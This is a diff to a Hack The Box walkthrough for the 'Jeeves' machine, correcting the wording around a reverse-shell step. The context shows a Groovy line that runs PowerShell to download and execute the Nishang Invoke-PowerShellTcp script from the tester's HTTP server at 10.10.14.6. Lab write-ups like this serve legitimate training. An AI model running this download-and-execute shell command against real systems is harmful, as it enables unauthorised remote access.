Rang3l2/HTB-Walkthroughs/Medium-Jeeves.md

 Exit code: 0
 ```

 The tester next started a shell on the host by downloading and invoking [this](https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcp.ps1) powershell script.
-The tester set up a HTTP server using python and a Netcat listener then used the beolow script to download and run the shell.
+The tester set up a HTTP server using python and a Netcat listener.
+Then used the below script to download and run the shell.

 ```
 def process = "powershell IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.6:8083/Invoke-PowerShellTcp.ps1')".execute()